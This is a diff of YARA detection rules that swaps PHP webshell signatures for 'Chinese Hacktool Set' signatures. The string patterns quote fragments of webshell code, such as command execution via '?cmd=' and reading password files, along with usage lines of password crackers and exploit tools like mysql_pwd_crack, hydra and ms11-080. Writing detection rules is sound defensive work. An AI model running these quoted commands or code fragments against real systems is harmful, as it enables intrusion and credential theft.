-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6344-L6359"
+		id = "3ddeb1c7-e124-5e9e-abcf-3856e0561165"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L1913-L1930"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "42d837e9ab764e95ed11b8bd6c29699d13fe4c41"
-		logic_hash = "2af3bbe8d1940e60843f3f5d40c9c6550e76df21568c374f7a871f73aeefae44"
+		hash = "57d1cb4d404688804a8c3755b464a6e6248d1c73"
+		logic_hash = "d272b98a6cf2749482ee501734d0043564ba528770161cb0ed4f032409305f22"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "<title>TrYaG Team - TrYaG.php - Edited By KingDefacer</title>" fullword
-		$s3 = "$tabledump = \"DROP TABLE IF EXISTS $table;\\n\"; " fullword
-		$s6 = "$string = !empty($_POST['string']) ? $_POST['string'] : 0; " fullword
-		$s7 = "$tabledump .= \"CREATE TABLE $table (\\n\"; " fullword
-		$s14 = "echo \"<center><div id=logostrip>Edit file: $editfile </div><form action='$REQUE"
+		$s1 = "mysql_pwd_crack 127.0.0.1 -x 3306 -p root -d userdict.txt" fullword ascii
+		$s2 = "Successfully --> username %s password %s " fullword ascii
+		$s3 = "zhouzhen@gmail.com http://zhouzhen.eviloctal.org" fullword ascii
+		$s4 = "-a automode  automatic crack the mysql password " fullword ascii
+		$s5 = "mysql_pwd_crack 127.0.0.1 -x 3306 -a" fullword ascii
 
 	condition:
-		3 of them
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and 1 of them
 }
-rule SIGNATURE_BASE_Webshell_Dc3_Security_Crew_Shell_Priv_2
+rule SIGNATURE_BASE_Cmdshell64 : FILE
 {
 	meta:
-		description = "PHP Webshells Github Archive - file dC3 Security Crew Shell PRiV.php"
+		description = "Chinese Hacktool Set - file CmdShell64.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1d4a95c4-8128-504d-958f-dcc5c68f4975"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6360-L6375"
+		id = "f4d69be7-f717-53f7-873e-86acbb309106"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L1932-L1951"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "9077eb05f4ce19c31c93c2421430dd3068a37f17"
-		logic_hash = "52dc0449c205ff9105e2dedc3cb4858f83a2efc7bae579656a26da493dc59500"
+		hash = "5b92510475d95ae5e7cd6ec4c89852e8af34acf1"
+		logic_hash = "fd8010ab2ab51feed62475f840ffaeef92cf1266c139b8f669b7fa5ff646fdab"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "@rmdir($_GET['file']) or die (\"[-]Error deleting dir!\");" fullword
-		$s9 = "header(\"Last-Modified: \".date(\"r\",filemtime(__FILE__)));" fullword
-		$s13 = "header(\"Content-type: image/gif\");" fullword
-		$s14 = "@copy($file,$to) or die (\"[-]Error copying file!\");" fullword
-		$s20 = "if (isset($_GET['rename_all'])) {" fullword
+		$s1 = "C:\\Windows\\System32\\JAVASYS.EXE" fullword wide
+		$s2 = "ServiceCmdShell" fullword ascii
+		$s3 = "<!-- If your application is designed to work with Windows 8.1, uncomment the fol" ascii
+		$s4 = "ServiceSystemShell" fullword wide
+		$s5 = "[Root@CmdShell ~]#" fullword wide
+		$s6 = "Hello Man 2015 !" fullword wide
+		$s7 = "CmdShell" fullword ascii
 
 	condition:
-		3 of them
+		uint16( 0 ) == 0x5a4d and filesize < 30KB and 4 of them
 }
-rule SIGNATURE_BASE_Webshell_Qsd_Php_Backdoor
+rule SIGNATURE_BASE_Ms_Viru_V : FILE
 {
 	meta:
-		description = "PHP Webshells Github Archive - file qsd-php-backdoor.php"
+		description = "Chinese Hacktool Set - file v.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f8208851-159c-5d0b-91ad-478aeb4fc9fd"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6376-L6390"
+		id = "88a01e7a-8210-5e0c-a9b8-b7c9b991e16b"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L1953-L1971"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "4856bce45fc5b3f938d8125f7cdd35a8bbae380f"
-		logic_hash = "3ef7b67cd60370a99fdfa6fd614f71ee314af27c9d983383dde8f03a127a28b3"
+		hash = "ecf4ba6d1344f2f3114d52859addee8b0770ed0d"
+		logic_hash = "028b589c11eeacb2edfeeaeaebf2da370e540cba964c9ebbb19e4c734afe190f"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "// A robust backdoor script made by Daniel Berliner - http://www.qsdconsulting.c"
-		$s2 = "if(isset($_POST[\"newcontent\"]))" fullword
-		$s3 = "foreach($parts as $val)//Assemble the path back together" fullword
-		$s7 = "$_POST[\"newcontent\"]=urldecode(base64_decode($_POST[\"newcontent\"]));" fullword
+		$s1 = "c:\\windows\\system32\\command.com /c " fullword ascii
+		$s2 = "Easy Usage Version -- Edited By: racle@tian6.com" fullword ascii
+		$s3 = "OH,Sry.Too long command." fullword ascii
+		$s4 = "Success! Commander." fullword ascii
+		$s5 = "Hey,how can racle work without ur command ?" fullword ascii
+		$s6 = "The exploit thread was unable to map the virtual 8086 address space" fullword ascii
 
 	condition:
-		2 of them
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and 3 of them
 }
-rule SIGNATURE_BASE_Webshell_Php_Webshells_Spygrup
+rule SIGNATURE_BASE_CN_Tools_Vscan : FILE
 {
 	meta:
-		description = "PHP Webshells Github Archive - file spygrup.php"
+		description = "Chinese Hacktool Set - file Vscan.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6391-L6405"
+		id = "2d73d9c9-62cd-592f-a44e-0a0456c85a3c"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L1973-L1990"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "12f9105332f5dc5d6360a26706cd79afa07fe004"
-		logic_hash = "5981f8cc1a98f799b1573cf73297383f995acf1c40f0227ac10302dc4d6fd6cc"
+		hash = "0365fe05e2de0f327dfaa8cd0d988dbb7b379612"
+		logic_hash = "2bbf0a3fb2b3fc9b646c6f8fc021f65a38e1b64edd74301481051541f8938902"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s2 = "kingdefacer@msn.com</FONT></CENTER></B>\");" fullword
-		$s6 = "if($_POST['root']) $root = $_POST['root'];" fullword
-		$s12 = "\".htmlspecialchars($file).\" Bu Dosya zaten Goruntuleniyor<kingdefacer@msn.com>" fullword
-		$s18 = "By KingDefacer From Spygrup.org>" fullword
+		$s1 = "[+] Usage: VNC_bypauth <target> <scantype> <option>" fullword ascii
+		$s2 = "========RealVNC <= 4.1.1 Bypass Authentication Scanner=======" fullword ascii
+		$s3 = "[+] Type VNC_bypauth <target>,<scantype> or <option> for more informations" fullword ascii
+		$s4 = "VNC_bypauth -i 192.168.0.1,192.168.0.2,192.168.0.3,..." fullword ascii
+		$s5 = "-vn:%-15s:%-7d  connection closed" fullword ascii
 
 	condition:
-		3 of them
+		uint16( 0 ) == 0x5a4d and filesize < 60KB and 2 of them
 }
-rule SIGNATURE_BASE_Webshell_Web_Shell__C_Shankar
+rule SIGNATURE_BASE_Dos_Iis : FILE
 {
 	meta:
-		description = "PHP Webshells Github Archive - file Web-shell (c)ShAnKaR.php"
+		description = "Chinese Hacktool Set - file iis.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "966f5580-21c5-5ecf-b500-bde3d1ba4494"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6406-L6420"
+		id = "8813b7a2-0d44-5f26-80ab-0f493c09a027"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L1992-L2011"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "3dd4f25bd132beb59d2ae0c813373c9ea20e1b7a"
-		logic_hash = "9d320eed18a5d76a87cee4ea0fa9caf08f096f7eeaab55420540aa082b596e0f"
+		hash = "61ffd2cbec5462766c6f1c44bd44eeaed4f3d2c7"
+		logic_hash = "d6852af79eac659f4dfa3019793290e0498739f02a06c5540cd7d2c65b46b960"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "header(\"Content-Length: \".filesize($_POST['downf']));" fullword
-		$s5 = "if($_POST['save']==0){echo \"<textarea cols=70 rows=10>\".htmlspecialchars($dump"
-		$s6 = "write(\"#\\n#Server : \".getenv('SERVER_NAME').\"" fullword
-		$s12 = "foreach(@file($_POST['passwd']) as $fed)echo $fed;" fullword
+		$s1 = "comspec" fullword ascii
+		$s2 = "program terming" fullword ascii
+		$s3 = "WinSta0\\Defau" fullword ascii
+		$s4 = "* FROM IIsWebInfo" ascii
+		$s5 = "www.icehack." ascii
+		$s6 = "wmiprvse.exe" fullword ascii
+		$s7 = "Pid: %d" ascii
 
 	condition:
-		2 of them
+		uint16( 0 ) == 0x5a4d and filesize < 70KB and all of them
 }
-rule SIGNATURE_BASE_Webshell_Ayyildiz_Tim___AYT__Shell_V_2_1_Biz
+rule SIGNATURE_BASE_Iisputscannesr : FILE
 {
 	meta:
-		description = "PHP Webshells Github Archive - file Ayyildiz Tim  -AYT- Shell v 2.1 Biz.php"
+		description = "Chinese Hacktool Set - file IISPutScannesr.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "fdd9bae9-80f3-5200-b922-e7d194009af8"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6421-L6435"
+		id = "c5d358e8-955f-5b96-89e7-eb0b6c4d0af0"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L2013-L2027"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "5fe8c1d01dc5bc70372a8a04410faf8fcde3cb68"
-		logic_hash = "2d096baad162c0e3e01732007a3be2804155e614a8fa4cd2d5dd3a7ac808fb49"
+		hash = "2dd8fee20df47fd4eed5a354817ce837752f6ae9"
+		logic_hash = "27c190050aabcdff3713b388adb0113ad2334c107a2a7b3d682c209b102cf642"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s7 = "<meta name=\"Copyright\" content=TouCh By iJOo\">" fullword
-		$s11 = "directory... Trust me - it works :-) */" fullword
-		$s15 = "/* ls looks much better with ' -F', IMHO. */" fullword
-		$s16 = "} else if ($command == 'ls') {" fullword
+		$s1 = "yoda & M.o.D." ascii
+		$s2 = "-> come.to/f2f **************" fullword ascii
 
 	condition:
-		3 of them
+		uint16( 0 ) == 0x5a4d and filesize < 500KB and all of them
 }
-rule SIGNATURE_BASE_Webshell_Gamma_Web_Shell
+rule SIGNATURE_BASE_HKTL_Unknown_CN_Generate : FILE
 {
 	meta:
-		description = "PHP Webshells Github Archive - file Gamma Web Shell.php"
+		description = "Chinese Hacktool Set - file Generate.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "43b4fc9f-8897-5553-8846-29d307efa885"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6436-L6450"
+		id = "88ad2c71-519f-58b0-87f8-a6f54a54a774"
+		date = "2015-06-13"
+		modified = "2022-01-20"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L2029-L2047"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "7ef773df7a2f221468cc8f7683e1ace6b1e8139a"
-		logic_hash = "1de868c4948a95272d288aeba3ac38b84bf6b33ede6b3b600b32530c85586404"
+		hash = "2cb4c3916271868c30c7b4598da697f59e9c7a12"
+		logic_hash = "a83000880bd71f4ee6507cb448b611cb670a47a4dc47c400930d3a41ca594a5d"
 		score = 75
-		quality = 85
-		tags = ""
+		quality = 83
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s4 = "$ok_commands = ['ls', 'ls -l', 'pwd', 'uptime'];" fullword
-		$s8 = "### Gamma Group <http://www.gammacenter.com>" fullword
-		$s15 = "my $error = \"This command is not available in the restricted mode.\\n\";" fullword
-		$s20 = "my $command = $self->query('command');" fullword
+		$s1 = "C:\\TEMP\\" ascii
+		$s2 = "Connection Closed Gracefully.;Could not bind socket. Address and port are alread" wide
+		$s3 = "$530 Please login with USER and PASS." fullword ascii
+		$s4 = "_Shell.exe" fullword ascii
+		$s5 = "ftpcWaitingPassword" fullword ascii
 
 	condition:
-		2 of them
+		uint16( 0 ) == 0x5a4d and filesize < 2000KB and 3 of them
 }
-rule SIGNATURE_BASE_Webshell_Php_Webshells_Aspydrv
+rule SIGNATURE_BASE_Pc_Rejoice : FILE
 {
 	meta:
-		description = "PHP Webshells Github Archive - file aspydrv.php"
+		description = "Chinese Hacktool Set - file rejoice.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6451-L6466"
+		id = "197b5a21-e1ed-5ea8-b7f2-e84684aedc54"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L2049-L2067"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "3d8996b625025dc549d73cdb3e5fa678ab35d32a"
-		logic_hash = "314fd671b163b9904cc78cb3a5858f5b1e3dfae9d520d5ebc545a7abd922e9f7"
+		hash = "fe634a9f5d48d5c64c8f8bfd59ac7d8965d8f372"
+		logic_hash = "9e22a98b5065a95a7f169fda8d6d4112101bffa11a1407e03ec152db41857206"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "Target = \"D:\\hshome\\masterhr\\masterhr.com\\\"  ' ---Directory to which files"
-		$s1 = "nPos = InstrB(nPosEnd, biData, CByteString(\"Content-Type:\"))" fullword
-		$s3 = "Document.frmSQL.mPage.value = Document.frmSQL.mPage.value - 1" fullword
-		$s17 = "If request.querystring(\"getDRVs\")=\"@\" then" fullword
-		$s20 = "' ---Copy Too Folder routine Start" fullword
+		$s1 = "@members.3322.net/dyndns/update?system=dyndns&hostname=" fullword ascii
+		$s2 = "http://www.xxx.com/xxx.exe" fullword ascii
+		$s3 = "@ddns.oray.com/ph/update?hostname=" fullword ascii
+		$s4 = "No data to read.$Can not bind in port range (%d - %d)" fullword wide
+		$s5 = "ListViewProcessListColumnClick!" fullword ascii
+		$s6 = "http://iframe.ip138.com/ic.asp" fullword ascii
 
 	condition:
-		3 of them
+		uint16( 0 ) == 0x5a4d and filesize < 3000KB and 3 of them
 }
-rule SIGNATURE_BASE_Webshell_Jspwebshell_1_2_2
+rule SIGNATURE_BASE_Ms11080_Withcmd : FILE
 {
 	meta:
-		description = "PHP Webshells Github Archive - file JspWebshell 1.2.php"
+		description = "Chinese Hacktool Set - file ms11080_withcmd.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "659f5c7d-0a9c-554d-a0ad-e3bcb8c5a1e9"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6467-L6482"
+		id = "fa5002ac-d6e6-543f-8020-43dfae689b3b"
+		date = "2015-06-13"
+		modified = "2022-12-21"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L2069-L2087"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "184fc72b51d1429c44a4c8de43081e00967cf86b"
-		logic_hash = "41d937fce969a850a2e4e07eb168becc96a036317a78d620e812707be9466dfc"
+		hash = "745e5058acff27b09cfd6169caf6e45097881a49"
+		logic_hash = "cd7167269538a5dd197260682ad777f87e43cc2155acf3ce731d1a065395cf4a"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "System.out.println(\"CreateAndDeleteFolder is error:\"+ex); " fullword
-		$s3 = "<%@ page contentType=\"text/html; charset=GBK\" language=\"java\" import=\"java."
-		$s4 = "// String tempfilepath=request.getParameter(\"filepath\");" fullword
-		$s15 = "endPoint=random1.getFilePointer();" fullword
-		$s20 = "if (request.getParameter(\"command\") != null) {" fullword
+		$s1 = "Usage : ms11-080.exe cmd.exe Command " fullword ascii
+		$s2 = "\\ms11080\\ms11080\\Debug\\ms11080.pdb" ascii
+		$s3 = "[>] by:Mer4en7y@90sec.org" fullword ascii
+		$s4 = "[>] create porcess error" fullword ascii
+		$s5 = "[>] ms11-080 Exploit" fullword ascii
 
 	condition:
-		3 of them
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and 1 of them
 }
-rule SIGNATURE_BASE_Webshell_G00Nshell_V1_3
+rule SIGNATURE_BASE_Othertools_Xiaoa : FILE
 {
 	meta:
-		description = "PHP Webshells Github Archive - file g00nshell-v1.3.php"
+		description = "Chinese Hacktool Set - file xiaoa.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "61a09576-7e62-5a30-a52c-492b81b96322"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6483-L6498"
+		id = "a456d373-2063-5264-8cf4-d0a5918392fc"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L2089-L2107"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "70fe072e120249c9e2f0a8e9019f984aea84a504"
-		logic_hash = "2ecb3ce2aa43a99552fb26e610c35bdb04f4ff0dc75c867e4327d6e27eed0177"
+		hash = "6988acb738e78d582e3614f83993628cf92ae26d"
+		logic_hash = "451ed602bd1e9dd7e4020108ea133b60c546965bd77be349d07be42150f80fee"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s10 = "#To execute commands, simply include ?cmd=___ in the url. #" fullword
-		$s15 = "$query = \"SHOW COLUMNS FROM \" . $_GET['table'];" fullword
-		$s16 = "$uakey = \"724ea055b975621b9d679f7077257bd9\"; // MD5 encoded user-agent" fullword
-		$s17 = "echo(\"<form method='GET' name='shell'>\");" fullword
-		$s18 = "echo(\"<form method='post' action='?act=sql'>\");" fullword
+		$s1 = "Usage:system_exp.exe \"cmd\"" fullword ascii
+		$s2 = "The shell \"cmd\" success!" fullword ascii
+		$s3 = "Not Windows NT family OS." fullword ascii
+		$s4 = "Unable to get kernel base address." fullword ascii
+		$s5 = "run \"%s\" failed,code: %d" fullword ascii
+		$s6 = "Windows Kernel Local Privilege Exploit " fullword ascii
 
 	condition:
-		2 of them
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and 2 of them
 }
-rule SIGNATURE_BASE_Webshell_Winx_Shell_2
+rule SIGNATURE_BASE_Unknown2 : FILE
 {
 	meta:
-		description = "PHP Webshells Github Archive - file WinX Shell.php"
+		description = "Chinese Hacktool Set - file unknown2.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ebad4f2e-96c3-5cb7-b228-de3a6a39ae55"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		old_rule_name = "WebShell_WinX_Shell"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6499-L6515"
+		id = "af7ddcbf-1cba-51a9-b435-9a267320f502"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L2109-L2128"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "a94d65c168344ad9fa406d219bdf60150c02010e"
-		logic_hash = "f953c297763e41d197ce186dc818b656951dfa8c855c5063fc4abb54eeefc7bb"
+		hash = "32508d75c3d95e045ddc82cb829281a288bd5aa3"
+		logic_hash = "dea499eaa87cc454a31672fb842539779926d50785ef827162fde84bfcdcc54a"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s4 = "// It's simple shell for all Win OS." fullword
-		$s5 = "//------- [netstat -an] and [ipconfig] and [tasklist] ------------" fullword
-		$s6 = "<html><head><title>-:[GreenwooD]:- WinX Shell</title></head>" fullword
-		$s13 = "// Created by greenwood from n57" fullword
-		$s20 = " if (is_uploaded_file($userfile)) {" fullword
+		$s1 = "http://md5.com.cn/index.php/md5reverse/index/md/" wide
+		$s2 = "http://www.md5decrypter.co.uk/feed/api.aspx?" wide
+		$s3 = "http://www.md5.com.cn" fullword wide
+		$s4 = "1.5.exe" fullword wide
+		$s5 = "\\Set.ini" wide
+		$s6 = "OpenFileDialog1" fullword wide
+		$s7 = " (*.txt)|*.txt" fullword wide
 
 	condition:
-		3 of them
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and 4 of them
 }
-rule SIGNATURE_BASE_Webshell_PHANTASMA
+rule SIGNATURE_BASE_Hydra_7_3_Hydra : FILE
 {
 	meta:
-		description = "PHP Webshells Github Archive - file PHANTASMA.php"
+		description = "Chinese Hacktool Set - file hydra.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b36a7dbb-7d40-5fca-8409-c8822298005c"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6516-L6530"
+		id = "70e9a5bf-ce2d-58ab-8bdc-257e2aa5e917"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L2130-L2147"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "cd12d42abf854cd34ff9e93a80d464620af6d75e"
-		logic_hash = "355be62807182f9a53bac20a6dead8f0a3bee83b6bdc4566502c157f16076b9b"
+		hash = "2f82b8bf1159e43427880d70bcd116dc9e8026ad"
+		logic_hash = "23194c2df0b8bdedc4fc66c423b0aebb10217de328a194b26560d4cc9a5531e3"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s12 = "\"    printf(\\\"Usage: %s [Host] <port>\\\\n\\\", argv[0]);\\n\" ." fullword
-		$s15 = "if ($portscan != \"\") {" fullword
-		$s16 = "echo \"<br>Banner: $get <br><br>\";" fullword
-		$s20 = "$dono = get_current_user( );" fullword
+		$s1 = "[ATTEMPT-ERROR] target %s - login \"%s\" - pass \"%s\" - child %d - %lu of %lu" fullword ascii
+		$s2 = "(DESCRIPTION=(CONNECT_DATA=(CID=(PROGRAM=))(COMMAND=reload)(PASSWORD=%s)(SERVICE" ascii
+		$s3 = "cn=^USER^,cn=users,dc=foo,dc=bar,dc=com for domain foo.bar.com" fullword ascii
+		$s4 = "[%d][smb] Host: %s Account: %s Error: ACCOUNT_CHANGE_PASSWORD" fullword ascii
+		$s5 = "hydra -P pass.txt target cisco-enable  (direct console access)" fullword ascii
 
 	condition:
-		3 of them
+		uint16( 0 ) == 0x5a4d and filesize < 700KB and 1 of them
 }
-rule SIGNATURE_BASE_Webshell_Php_Webshells_Cw
+rule SIGNATURE_BASE_Oraclescan : FILE
 {
 	meta:
-		description = "PHP Webshells Github Archive - file cw.php"
+		description = "Chinese Hacktool Set - file OracleScan.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6531-L6547"
+		id = "142c0ed1-0752-54c3-9a4b-68e656c32939"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L2149-L2165"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "e65e0670ef6edf0a3581be6fe5ddeeffd22014bf"
-		logic_hash = "52bfb14f4d5d3df787ce7782cbbee25ea1556758eed48e3001c8a3f35a541526"
+		hash = "10ff7faf72fe6da8f05526367b3522a2408999ec"
+		logic_hash = "b9454f47123c32d6c6b51722aeadac9acc2a6232c259703c36ea00c83d8977e6"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "// Dump Database [pacucci.com]" fullword
